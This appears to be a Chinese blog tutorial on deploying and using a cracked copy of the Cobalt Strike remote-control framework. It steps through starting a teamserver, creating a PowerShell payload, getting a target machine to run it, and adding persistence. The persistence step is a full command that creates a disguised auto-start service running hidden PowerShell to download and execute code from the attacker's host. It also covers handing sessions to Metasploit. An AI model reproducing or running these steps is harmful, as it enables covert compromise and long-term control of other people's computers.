CobaltStrike远控的搭建与使用

0x01 介绍

Cobalt Strike3.12是一款渗透测试神器,是外国人写的,常被业界人称为CS神器。Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。我对其中的一些主要功能做一个介绍吧。

0x02 下载

我选择的是cobaltstrike 3.12的破解版,被某大佬破解也没多久。分析过,暂无发现后门。先下载,会有三个文件。

image.png

0x03 安装

购买的服务器配置也不要太渣了吧,至少你也得搞个1G以上的内存吧。2G内存才为正常水平。
Linux服务器安装好:java。
系统可以选用:Centos 64, Deepin 64, Ubuntu 64 其中任意一种。
把cobaltstrike-linux.zip放置到Linux服务器任意目录。使用命令解压。

image.png
image.png

进入cobaltstrike-linux文件夹后,启动teamserver文件,使用命令启动服务端:./teamserver 服务器IP 密码; 再回车。没有出现错误即启动成功。看下图。

image.png

0x04 客户端

在本地解压cobaltstrike-win.zip(我用的是Windows系统),双击启动Cobaltstrike.exe。

image.png

输入好IP和连接密码, 用户名可以不用输。用默认就好了,再点击Connect连接 。

image.png

0x05 监听

连接上了后,点击左上角的Cobalt—>Listenrs,会出现Listeners栏目。
点击Add 弹出输入框,输入Name,Port监听的端口号。点击Save保存。

image.png

一 直点击确定就好了。就可以看到多了一个刚才创建的Listeners。监听的设置就完工了 。


image.png

0x06 目标机上线

目标机器上线前,要创建一个Payload,看图创建。


image.png

我最多用的是Powershell反弹方式,我就创建Powershell。注意:Payload端口要和之前设置监听的端口保持一致。 没有Powershell也可以选择创建Python、regsvr32、bitsadmin的类型。之后再点击Launch。

image.png

会提示创建成功:Success字样。
这里复制 框的中一串长命令,点击OK即可。

image.png

在目标机器的cmd窗口:粘贴刚才复制的命令,回车。


image.png

就可以看到,目标机器上线成功了,也就控制成功了。

image.png

0x07 权限维持

虽然上线了,但目标机器因为意外情况重启后,并不会重新上线,所以要给目标机器加一个开机自启。

添加开机自启命令:

shell sc create "Windows Powr" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://你的ip/创建时的name'))\""&sc config "Windows Powr" start= auto

选中机器,右击选择Interact ,粘贴那一串开机自启命令,回车。请看图操作:

image.png

0x08 反弹到Msf神器

在任意的云VPS主机上启动Msf,进行监听。
我是这么监听的,看下图:

image.png

在CS上选择一个目标机器,右击再点击Spawn功能,add添加Choose listener,填写好Msf监听的IP,端口,name随便输入。保存即可。

image.png

选择刚才创建的Choose listener,点击Choose。Msf坐等上线。

image.png

0x09 其他

CS的功能有很多,比如:读取远程登录密码、一键提权、文件管理、命令执行、网站劫持、键盘记录、绕杀软、流量转发-日内网、等等很实用的功能,就不一一介绍了。不得不佩服老外写的东西确实可以的。

你可能感兴趣的:(CobaltStrike远控的搭建与使用)